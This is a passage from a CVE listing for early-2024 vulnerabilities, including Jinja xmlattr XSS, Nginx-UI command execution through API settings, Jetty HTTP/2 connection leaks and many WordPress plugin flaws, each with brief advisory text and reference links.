URL:https://github.com/benbusby/whoogle-search/commit/3a2e0b262e4a076a20416b45e6b6f23fd265aeda | MISC:https://securitylab.github.com/advisories/GHSL-2023-186_GHSL-2023-189_benbusby_whoogle-search/ | URL:https://securitylab.github.com/advisories/GHSL-2023-186_GHSL-2023-189_benbusby_whoogle-search/ Assigned (20240108)
CVE 2024 22202 Candidate phpMyFAQ is an open source FAQ web application for PHP 8.1+ and MySQL, PostgreSQL and other databases. phpMyFAQ's user removal page allows an attacker to spoof another user's detail, and in turn make a compelling phishing case for removing another user's account. The front-end of this page doesn't allow changing the form details, an attacker can utilize a proxy to intercept this request and submit other data. Upon submitting this form, an email is sent to the administrator informing them that this user wants to delete their account. An administrator has no way of telling the difference between the actual user wishing to delete their account or the attacker issuing this for an account they do not control. This issue has been patched in version 3.2.5. MISC:https://github.com/thorsten/phpMyFAQ/commit/1348dcecdaec5a5714ad567c16429432417b534d | URL:https://github.com/thorsten/phpMyFAQ/commit/1348dcecdaec5a5714ad567c16429432417b534d | MISC:https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-6648-6g96-mg35 | URL:https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-6648-6g96-mg35 Assigned (20240108)
CVE 2024 22201 Candidate Jetty is a Java based web server and servlet engine. An HTTP/2 SSL connection that is established and TCP congested will be leaked when it times out. An attacker can cause many connections to end up in this state, and the server may run out of file descriptors, eventually causing the server to stop accepting new connections from valid clients. The vulnerability is patched in 9.4.54, 10.0.20, 11.0.20, and 12.0.6. MISC:https://github.com/jetty/jetty.project/issues/11256 | URL:https://github.com/jetty/jetty.project/issues/11256 | MISC:https://github.com/jetty/jetty.project/security/advisories/GHSA-rggv-cv7r-mw98 | URL:https://github.com/jetty/jetty.project/security/advisories/GHSA-rggv-cv7r-mw98 Assigned (20240108)
CVE 2024 22200 Candidate vantage6-UI is the User Interface for vantage6. The docker image used to run the UI leaks the nginx version. To mitigate the vulnerability, users can run the UI as an angular application. This vulnerability was patched in 4.2.0. MISC:https://github.com/vantage6/vantage6-UI/commit/92e0fb5102b544d5bcc23980d973573733e2e020 | URL:https://github.com/vantage6/vantage6-UI/commit/92e0fb5102b544d5bcc23980d973573733e2e020 | MISC:https://github.com/vantage6/vantage6-UI/security/advisories/GHSA-8wxq-346h-xmr8 | URL:https://github.com/vantage6/vantage6-UI/security/advisories/GHSA-8wxq-346h-xmr8 Assigned (20240108)
CVE 2024 22199 Candidate This package provides universal methods to use multiple template engines with the Fiber web framework using the Views interface. This vulnerability specifically impacts web applications that render user-supplied data through this template engine, potentially leading to the execution of malicious scripts in users' browsers when visiting affected web pages. The vulnerability has been addressed, the template engine now defaults to having autoescape set to `true`, effectively mitigating the risk of XSS attacks. MISC:https://github.com/gofiber/template/commit/28cff3ac4d4c117ab25b5396954676d624b6cb46 | URL:https://github.com/gofiber/template/commit/28cff3ac4d4c117ab25b5396954676d624b6cb46 | MISC:https://github.com/gofiber/template/security/advisories/GHSA-4mq2-gc4j-cmw6 | URL:https://github.com/gofiber/template/security/advisories/GHSA-4mq2-gc4j-cmw6 Assigned (20240108)
CVE 2024 22198 Candidate Nginx-UI is a web interface to manage Nginx configurations. It is vulnerable to arbitrary command execution by abusing the configuration settings. The `Home > Preference` page exposes a list of system settings such as `Run Mode`, `Jwt Secret`, `Node Secret` and `Terminal Start Command`. While the UI doesn't allow users to modify the `Terminal Start Command` setting, it is possible to do so by sending a request to the API. This issue may lead to authenticated remote code execution, privilege escalation, and information disclosure. This vulnerability has been patched in version 2.0.0.beta.9. MISC:https://github.com/0xJacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/api/system/settings.go#L18 | URL:https://github.com/0xJacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/api/system/settings.go#L18 | MISC:https://github.com/0xJacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/api/terminal/pty.go#L11 | URL:https://github.com/0xJacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/api/terminal/pty.go#L11 | MISC:https://github.com/0xJacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/internal/pty/pipeline.go#L29 | URL:https://github.com/0xJacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/internal/pty/pipeline.go#L29 | MISC:https://github.com/0xJacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/router/middleware.go#L45 | URL:https://github.com/0xJacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/router/middleware.go#L45 | MISC:https://github.com/0xJacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/settings/server.go#L12 | URL:https://github.com/0xJacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/settings/server.go#L12 | MISC:https://github.com/0xJacky/nginx-ui/commit/827e76c46e63c52114a62a899f61313039c754e3 | URL:https://github.com/0xJacky/nginx-ui/commit/827e76c46e63c52114a62a899f61313039c754e3 | MISC:https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-8r25-68wm-jw35 | URL:https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-8r25-68wm-jw35 Assigned (20240108)
CVE 2024 22197 Candidate Nginx-ui is online statistics for Server Indicators Monitor CPU usage, memory usage, load average, and disk usage in real-time. The `Home > Preference` page exposes a small list of nginx settings such as `Nginx Access Log Path` and `Nginx Error Log Path`. However, the API also exposes `test_config_cmd`, `reload_cmd` and `restart_cmd`. While the UI doesn't allow users to modify any of these settings, it is possible to do so by sending a request to the API. This issue may lead to authenticated Remote Code Execution, Privilege Escalation, and Information Disclosure. This issue has been patched in version 2.0.0.beta.9. MISC:https://github.com/0xJacky/nginx-ui/commit/827e76c46e63c52114a62a899f61313039c754e3 | URL:https://github.com/0xJacky/nginx-ui/commit/827e76c46e63c52114a62a899f61313039c754e3 | MISC:https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-pxmr-q2x3-9x9m | URL:https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-pxmr-q2x3-9x9m Assigned (20240108)
CVE 2024 22196 Candidate Nginx-UI is an online statistics for Server Indicators Monitor CPU usage, memory usage, load average, and disk usage in real-time. This issue may lead to information disclosure. By using `DefaultQuery`, the `"desc"` and `"id"` values are used as default values if the query parameters are not set. Thus, the `order` and `sort_by` query parameter are user-controlled and are being appended to the `order` variable without any sanitization. This issue has been patched in version 2.0.0.beta.9. MISC:https://github.com/0xJacky/nginx-ui/commit/ec93ab05a3ecbb6bcf464d9dca48d74452df8a5b | URL:https://github.com/0xJacky/nginx-ui/commit/ec93ab05a3ecbb6bcf464d9dca48d74452df8a5b | MISC:https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-h374-mm57-879c | URL:https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-h374-mm57-879c Assigned (20240108)
CVE 2024 22195 Candidate Jinja is an extensible templating engine. Special placeholders in the template allow writing code similar to Python syntax. It is possible to inject arbitrary HTML attributes into the rendered HTML template, potentially leading to Cross-Site Scripting (XSS). The Jinja `xmlattr` filter can be abused to inject arbitrary HTML attribute keys and values, bypassing the auto escaping mechanism and potentially leading to XSS. It may also be possible to bypass attribute validation checks if they are blacklist-based. FEDORA:FEDORA-2024-6026572e7d | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/O7YWRBX6JQCWC2XXCTZ55C7DPMGICCN3/ | FEDORA:FEDORA-2024-604e4c3509 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DELCVUUYX75I5K4Q5WMJG4MUZJA6VAIP/ | FEDORA:FEDORA-2024-ab372beea4 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5XCWZD464AJJJUBOO7CMPXQ4ROBC6JX2/ | MISC:https://github.com/pallets/jinja/releases/tag/3.1.3 | URL:https://github.com/pallets/jinja/releases/tag/3.1.3 | MISC:https://github.com/pallets/jinja/security/advisories/GHSA-h5c8-rqwp-cp95 | URL:https://github.com/pallets/jinja/security/advisories/GHSA-h5c8-rqwp-cp95 | MLIST:[debian-lts-announce] 20240123 [SECURITY] [DLA 3715-1] jinja2 security update | URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00010.html Assigned (20240108)
CVE 2024 22194 Candidate cdo-local-uuid project provides a specialized UUID-generating function that can, on user request, cause a program to generate deterministic UUIDs. An information leakage vulnerability is present in `cdo-local-uuid` at version `0.4.0`, and in `case-utils` in unpatched versions (matching the pattern `0.x.0`) at and since `0.5.0`, before `0.15.0`. The vulnerability stems from a Python function, `cdo_local_uuid.local_uuid()`, and its original implementation `case_utils.local_uuid()`. MISC:https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/commit/9e78f7cb1075728d0aafc918514f32a1392cd235 | URL:https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/commit/9e78f7cb1075728d0aafc918514f32a1392cd235 | MISC:https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/3 | URL:https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/3 | MISC:https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/4 | URL:https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/4 | MISC:https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/security/advisories/GHSA-rgrf-6mf5-m882 | URL:https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/security/advisories/GHSA-rgrf-6mf5-m882 | MISC:https://github.com/casework/CASE-Utilities-Python/commit/00864cd12de7c50d882dd1a74915d32e939c25f9 | URL:https://github.com/casework/CASE-Utilities-Python/commit/00864cd12de7c50d882dd1a74915d32e939c25f9 | MISC:https://github.com/casework/CASE-Utilities-Python/commit/1cccae8eb3cf94b3a28f6490efa0fbf5c82ebd6b | URL:https://github.com/casework/CASE-Utilities-Python/commit/1cccae8eb3cf94b3a28f6490efa0fbf5c82ebd6b | MISC:https://github.com/casework/CASE-Utilities-Python/commit/5acb929dfb599709d1c8c90d1824dd79e0fd9e10 | URL:https://github.com/casework/CASE-Utilities-Python/commit/5acb929dfb599709d1c8c90d1824dd79e0fd9e10 | MISC:https://github.com/casework/CASE-Utilities-Python/commit/7e02d18383eabbeb9fb4ec97d81438c9980a4790 | URL:https://github.com/casework/CASE-Utilities-Python/commit/7e02d18383eabbeb9fb4ec97d81438c9980a4790 | MISC:https://github.com/casework/CASE-Utilities-Python/commit/80551f49241c874c7c50e14abe05c5017630dad2 | URL:https://github.com/casework/CASE-Utilities-Python/commit/80551f49241c874c7c50e14abe05c5017630dad2 | MISC:https://github.com/casework/CASE-Utilities-Python/commit/939775f956796d0432ecabbf62782ed7ad1007b5 | URL:https://github.com/casework/CASE-Utilities-Python/commit/939775f956796d0432ecabbf62782ed7ad1007b5 | MISC:https://github.com/casework/CASE-Utilities-Python/commit/db428a0745dac4fdd888ced9c52f617695519f9d | URL:https://github.com/casework/CASE-Utilities-Python/commit/db428a0745dac4fdd888ced9c52f617695519f9d | MISC:https://github.com/casework/CASE-Utilities-Python/commit/e4ffadc3d56fd303b8f465d727c4a58213d311a1 | URL:https://github.com/casework/CASE-Utilities-Python/commit/e4ffadc3d56fd303b8f465d727c4a58213d311a1 | MISC:https://github.com/casework/CASE-Utilities-Python/commit/fca7388f09feccd3b9ea88e6df9c7a43a5349452 | URL:https://github.com/casework/CASE-Utilities-Python/commit/fca7388f09feccd3b9ea88e6df9c7a43a5349452 | MISC:https://github.com/casework/CASE-Utilities-Python/commit/fdc32414eccfcbde6be0fd91b7f491cc0779b02d#diff-e60b9cb8fb480ed27283a030a0898be3475992d78228f4045b12ce5cbb2f0509 | URL:https://github.com/casework/CASE-Utilities-Python/commit/fdc32414eccfcbde6be0fd91b7f491cc0779b02d#diff-e60b9cb8fb480ed27283a030a0898be3475992d78228f4045b12ce5cbb2f0509 Assigned (20240108)
CVE 2024 22193 Candidate The vantage6 technology enables to manage and deploy privacy enhancing technologies like Federated Learning (FL) and Multi-Party Computation (MPC). There are no checks on whether the input is encrypted if a task is created in an encrypted collaboration. Therefore, a user may accidentally create a task with sensitive input data that will then be stored unencrypted in a database. Users should ensure they set the encryption setting correctly. This vulnerability is patched in 4.2.0. MISC:https://github.com/vantage6/vantage6/commit/6383283733b81abfcacfec7538dc4dc882e98074 | URL:https://github.com/vantage6/vantage6/commit/6383283733b81abfcacfec7538dc4dc882e98074 | MISC:https://github.com/vantage6/vantage6/security/advisories/GHSA-rjmv-52mp-gjrr | URL:https://github.com/vantage6/vantage6/security/advisories/GHSA-rjmv-52mp-gjrr Assigned (20240108)
CVE 2024 22192 Candidate Ursa is a cryptographic library for use with blockchains. The revocation scheme that is part of the Ursa CL-Signatures implementations has a flaw that could impact the privacy guarantees defined by the AnonCreds verifiable credential model. Notably, a malicious verifier may be able to generate a unique identifier for a holder providing a verifiable presentation that includes a Non-Revocation proof. The impact of the flaw is that a malicious verifier may be able to determine a unique identifier for a holder presenting a Non-Revocation proof. Ursa has moved to end-of-life status and no fix is expected. MISC:https://github.com/hyperledger-archives/ursa/security/advisories/GHSA-6698-mhxx-r84g | URL:https://github.com/hyperledger-archives/ursa/security/advisories/GHSA-6698-mhxx-r84g Assigned (20240108)
CVE 2024 22191 Candidate Avo is a framework to create admin panels for Ruby on Rails apps. A stored cross-site scripting (XSS) vulnerability was found in the key_value field of Avo v3.2.3 and v2.46.0. This vulnerability could allow an attacker to execute arbitrary JavaScript code in the victim's browser. The value of the key_value is inserted directly into the HTML code. In the current version of Avo (possibly also older versions), the value is not properly sanitized before it is inserted into the HTML code. This vulnerability could be used to steal sensitive information from victims that could be used to hijack victims' accounts or redirect them to malicious websites. Avo 3.2.4 and 2.47.0 include a fix for this issue. Users are advised to upgrade. MISC:https://github.com/avo-hq/avo/commit/51bb80b181cd8e31744bdc4e7f9b501c81172347 | URL:https://github.com/avo-hq/avo/commit/51bb80b181cd8e31744bdc4e7f9b501c81172347 | MISC:https://github.com/avo-hq/avo/commit/fc92a05a8556b1787c8694643286a1afa6a71258 | URL:https://github.com/avo-hq/avo/commit/fc92a05a8556b1787c8694643286a1afa6a71258 | MISC:https://github.com/avo-hq/avo/security/advisories/GHSA-ghjv-mh6x-7q6h | URL:https://github.com/avo-hq/avo/security/advisories/GHSA-ghjv-mh6x-7q6h Assigned (20240108)
CVE 2024 22190 Candidate GitPython is a python library used to interact with Git repositories. There is an incomplete fix for CVE-2023-40590. On Windows, GitPython uses an untrusted search path if it uses a shell to run `git`, as well as when it runs `bash.exe` to interpret hooks. If either of those features are used on Windows, a malicious `git.exe` or `bash.exe` may be run from an untrusted repository. This issue has been patched in version 3.1.41. MISC:https://github.com/gitpython-developers/GitPython/commit/ef3192cc414f2fd9978908454f6fd95243784c7f | URL:https://github.com/gitpython-developers/GitPython/commit/ef3192cc414f2fd9978908454f6fd95243784c7f | MISC:https://github.com/gitpython-developers/GitPython/pull/1792 | URL:https://github.com/gitpython-developers/GitPython/pull/1792 | MISC:https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-2mqj-m65w-jghx | URL:https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-2mqj-m65w-jghx Assigned (20240108)
CVE 2024 22188 Candidate TYPO3 before 13.0.1 allows an authenticated admin user (with system maintainer privileges) to execute arbitrary shell commands (with the privileges of the web server) via a command injection vulnerability in form fields of the Install Tool. The fixed versions are 8.7.57 ELTS, 9.5.46 ELTS, 10.4.43 ELTS, 11.5.35 LTS, 12.4.11 LTS, and 13.0.1. MISC:https://github.com/TYPO3/typo3/security/advisories/GHSA-5w2h-59j3-8x5w | MISC:https://typo3.org/help/security-advisories | MISC:https://typo3.org/security/advisory/typo3-core-sa-2024-002 Assigned (20240106)
CVE 2024 22182 Candidate A remote, unauthenticated attacker may be able to send crafted messages to the web server of the Commend WS203VICM causing the system to restart, interrupting service. MISC:https://clibrary-online.commend.com/en/cyber-security/security-advisories.html | URL:https://clibrary-online.commend.com/en/cyber-security/security-advisories.html | MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-051-01 | URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-051-01 Assigned (20240130)
CVE 2024 22167 Candidate A potential DLL hijacking vulnerability in the SanDisk PrivateAccess application for Windows that could lead to arbitrary code execution in the context of the system user. This vulnerability is only exploitable locally if an attacker has access to a copy of the user's vault or has already gained access into a user's system. This attack is limited to the system in context and cannot be propagated. MISC:https://www.westerndigital.com/support/product-security/wdc-24002-sandisk-privateaccess-desktop-app-v-6-4-10 | URL:https://www.westerndigital.com/support/product-security/wdc-24002-sandisk-privateaccess-desktop-app-v-6-4-10 Assigned (20240105)
CVE 2024 22165 Candidate In Splunk Enterprise Security (ES) versions lower than 7.1.2, an attacker can create a malformed Investigation to perform a denial of service (DoS). The malformed investigation prevents the generation and rendering of the Investigations manager until it is deleted.<br>The vulnerability requires an authenticated session and access to create an Investigation. It only affects the availability of the Investigations manager, but without the manager, the Investigations functionality becomes unusable for most users. MISC:https://advisory.splunk.com/advisories/SVD-2024-0102 | URL:https://advisory.splunk.com/advisories/SVD-2024-0102 | MISC:https://research.splunk.com/application/7f6a07bd-82ef-46b8-8eba-802278abd00e/ | URL:https://research.splunk.com/application/7f6a07bd-82ef-46b8-8eba-802278abd00e/ Assigned (20240105)
CVE 2024 22164 Candidate In Splunk Enterprise Security (ES) versions below 7.1.2, an attacker can use investigation attachments to perform a denial of service (DoS) to the Investigation. The attachment endpoint does not properly limit the size of the request which lets an attacker cause the Investigation to become inaccessible. MISC:https://advisory.splunk.com/advisories/SVD-2024-0101 | URL:https://advisory.splunk.com/advisories/SVD-2024-0101 | MISC:https://research.splunk.com/application/bb85b25e-2d6b-4e39-bd27-50db42edcb8f/ | URL:https://research.splunk.com/application/bb85b25e-2d6b-4e39-bd27-50db42edcb8f/ Assigned (20240105)
CVE 2024 22163 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Shield Security Shield Security – Smart Bot Blocking & Intrusion Prevention Security allows Stored XSS.This issue affects Shield Security – Smart Bot Blocking & Intrusion Prevention Security: from n/a through 18.5.7. MISC:https://patchstack.com/database/vulnerability/wp-simple-firewall/wordpress-shield-security-plugin-18-5-7-unauthenticated-stored-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/wp-simple-firewall/wordpress-shield-security-plugin-18-5-7-unauthenticated-stored-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240105)
CVE 2024 22162 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPZOOM Shortcodes allows Reflected XSS.This issue affects WPZOOM Shortcodes: from n/a through 1.0.1. MISC:https://patchstack.com/database/vulnerability/wpzoom-shortcodes/wordpress-wpzoom-shortcodes-plugin-1-0-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/wpzoom-shortcodes/wordpress-wpzoom-shortcodes-plugin-1-0-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240105)
CVE 2024 22161 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Harmonic Design HD Quiz allows Stored XSS.This issue affects HD Quiz: from n/a through 1.8.11. MISC:https://patchstack.com/database/vulnerability/hd-quiz/wordpress-hd-quiz-plugin-1-8-11-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/hd-quiz/wordpress-hd-quiz-plugin-1-8-11-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240105)
CVE 2024 22160 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Bradley B. Dalina Image Tag Manager allows Reflected XSS.This issue affects Image Tag Manager: from n/a through 1.5. MISC:https://patchstack.com/database/vulnerability/image-tag-manager/wordpress-image-tag-manager-plugin-1-5-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/image-tag-manager/wordpress-image-tag-manager-plugin-1-5-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240105)
CVE 2024 2216 Candidate A missing permission check in an HTTP endpoint in Jenkins docker-build-step Plugin 2.11 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified TCP or Unix socket URL, and to reconfigure the plugin using the provided connection test parameters, affecting future build step executions. MISC:Jenkins Security Advisory 2024-03-06 | URL:https://www.jenkins.io/security/advisory/2024-03-06/#SECURITY-3200 Assigned (20240306)
CVE 2024 22159 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in realmag777 WOLF – WordPress Posts Bulk Editor and Manager Professional allows Reflected XSS.This issue affects WOLF – WordPress Posts Bulk Editor and Manager Professional: from n/a through 1.0.8. MISC:https://patchstack.com/database/vulnerability/bulk-editor/wordpress-wolf-wordpress-posts-bulk-editor-and-manager-professional-plugin-1-0-8-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/bulk-editor/wordpress-wolf-wordpress-posts-bulk-editor-and-manager-professional-plugin-1-0-8-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240105)
CVE 2024 22158 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PeepSo Community by PeepSo – Social Network, Membership, Registration, User Profiles allows Stored XSS.This issue affects Community by PeepSo – Social Network, Membership, Registration, User Profiles: from n/a before 6.3.1.0. MISC:https://patchstack.com/database/vulnerability/peepso-photos/wordpress-peepso-photos-add-on-plugin-6-3-1-0-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/peepso-photos/wordpress-peepso-photos-add-on-plugin-6-3-1-0-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240105)
CVE 2024 22156 Candidate Missing Authorization vulnerability in SNP Digital SalesKing.This issue affects SalesKing: from n/a through 1.6.15. MISC:https://patchstack.com/database/vulnerability/salesking/wordpress-salesking-plugin-1-6-15-unauthenticated-plugin-settings-change-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/salesking/wordpress-salesking-plugin-1-6-15-unauthenticated-plugin-settings-change-vulnerability?_s_id=cve Assigned (20240105)
CVE 2024 22154 Candidate Exposure of Sensitive Information to an Unauthorized Actor vulnerability in SNP Digital SalesKing.This issue affects SalesKing: from n/a through 1.6.15. MISC:https://patchstack.com/database/vulnerability/salesking/wordpress-salesking-plugin-1-6-15-unauthenticated-sensitive-data-exposure-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/salesking/wordpress-salesking-plugin-1-6-15-unauthenticated-sensitive-data-exposure-vulnerability?_s_id=cve Assigned (20240105)
CVE 2024 22153 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Fahad Mahmood & Alexandre Faustino Stock Locations for WooCommerce allows Stored XSS.This issue affects Stock Locations for WooCommerce: from n/a through 2.5.9. MISC:https://patchstack.com/database/vulnerability/stock-locations-for-woocommerce/wordpress-stock-locations-for-woocommerce-plugin-2-5-9-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/stock-locations-for-woocommerce/wordpress-stock-locations-for-woocommerce-plugin-2-5-9-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240105)
CVE 2024 22152 Candidate Unrestricted Upload of File with Dangerous Type vulnerability in WebToffee Product Import Export for WooCommerce.This issue affects Product Import Export for WooCommerce: from n/a through 2.3.7. MISC:https://patchstack.com/database/vulnerability/product-import-export-for-woo/wordpress-product-import-export-for-woocommerce-plugin-2-3-7-arbitrary-file-upload-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/product-import-export-for-woo/wordpress-product-import-export-for-woocommerce-plugin-2-3-7-arbitrary-file-upload-vulnerability?_s_id=cve Assigned (20240105)
CVE 2024 22150 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PWR Plugins Portfolio & Image Gallery for WordPress | PowerFolio allows Stored XSS.This issue affects Portfolio & Image Gallery for WordPress | PowerFolio: from n/a through 3.1. MISC:https://patchstack.com/database/vulnerability/portfolio-elementor/wordpress-powerfolio-plugin-3-1-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/portfolio-elementor/wordpress-powerfolio-plugin-3-1-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240105)
CVE 2024 2215 Candidate A cross-site request forgery (CSRF) vulnerability in Jenkins docker-build-step Plugin 2.11 and earlier allows attackers to connect to an attacker-specified TCP or Unix socket URL, and to reconfigure the plugin using the provided connection test parameters, affecting future build step executions. MISC:Jenkins Security Advisory 2024-03-06 | URL:https://www.jenkins.io/security/advisory/2024-03-06/#SECURITY-3200 Assigned (20240306)
CVE 2024 22148 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Smart Editor JoomUnited allows Reflected XSS.This issue affects JoomUnited: from n/a through 1.3.3. MISC:https://patchstack.com/database/vulnerability/wp-smart-editor/wordpress-wp-smart-editor-plugin-1-3-3-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/wp-smart-editor/wordpress-wp-smart-editor-plugin-1-3-3-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240105)
CVE 2024 22147 Candidate Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WP Overnight PDF Invoices & Packing Slips for WooCommerce.This issue affects PDF Invoices & Packing Slips for WooCommerce: from n/a through 3.7.5. MISC:https://patchstack.com/database/vulnerability/woocommerce-pdf-invoices-packing-slips/wordpress-pdf-invoices-packing-slips-for-woocommerce-plugin-3-7-5-sql-injection-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/woocommerce-pdf-invoices-packing-slips/wordpress-pdf-invoices-packing-slips-for-woocommerce-plugin-3-7-5-sql-injection-vulnerability?_s_id=cve Assigned (20240105)
CVE 2024 22146 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Magazine3 Schema & Structured Data for WP & AMP allows Stored XSS.This issue affects Schema & Structured Data for WP & AMP: from n/a through 1.25. MISC:https://patchstack.com/database/vulnerability/schema-and-structured-data-for-wp/wordpress-schema-structured-data-for-wp-amp-plugin-1-25-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/schema-and-structured-data-for-wp/wordpress-schema-structured-data-for-wp-amp-plugin-1-25-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240105)
CVE 2024 22143 Candidate Cross-Site Request Forgery (CSRF) vulnerability in WP Spell Check.This issue affects WP Spell Check: from n/a through 9.17. MISC:https://patchstack.com/database/vulnerability/wp-spell-check/wordpress-wp-spell-check-plugin-9-17-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/wp-spell-check/wordpress-wp-spell-check-plugin-9-17-cross-site-request-forgery-csrf-vulnerability?_s_id=cve Assigned (20240105)
CVE 2024 22142 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Cozmoslabs Profile Builder Pro allows Reflected XSS.This issue affects Profile Builder Pro: from n/a through 3.10.0. MISC:https://patchstack.com/database/vulnerability/profile-builder-pro/wordpress-profile-builder-pro-plugin-3-10-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/profile-builder-pro/wordpress-profile-builder-pro-plugin-3-10-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240105)
CVE 2024 22141 Candidate Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Cozmoslabs Profile Builder Pro.This issue affects Profile Builder Pro: from n/a through 3.10.0. MISC:https://patchstack.com/database/vulnerability/profile-builder-pro/wordpress-profile-builder-pro-plugin-3-10-0-totp-secret-key-exposure-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/profile-builder-pro/wordpress-profile-builder-pro-plugin-3-10-0-totp-secret-key-exposure-vulnerability?_s_id=cve Assigned (20240105)
CVE 2024 22140 Candidate Cross-Site Request Forgery (CSRF) vulnerability in Cozmoslabs Profile Builder Pro.This issue affects Profile Builder Pro: from n/a through 3.10.0. MISC:https://patchstack.com/database/vulnerability/profile-builder-pro/wordpress-profile-builder-pro-plugin-3-10-0-csrf-leading-to-account-takeover-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/profile-builder-pro/wordpress-profile-builder-pro-plugin-3-10-0-csrf-leading-to-account-takeover-vulnerability?_s_id=cve Assigned (20240105)
CVE 2024 22137 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in MailMunch Constant Contact Forms by MailMunch allows Stored XSS.This issue affects Constant Contact Forms by MailMunch: from n/a through 2.0.11. MISC:https://patchstack.com/database/vulnerability/constant-contact-forms-by-mailmunch/wordpress-constant-contact-forms-by-mailmunch-plugin-2-0-11-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/constant-contact-forms-by-mailmunch/wordpress-constant-contact-forms-by-mailmunch-plugin-2-0-11-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240105)
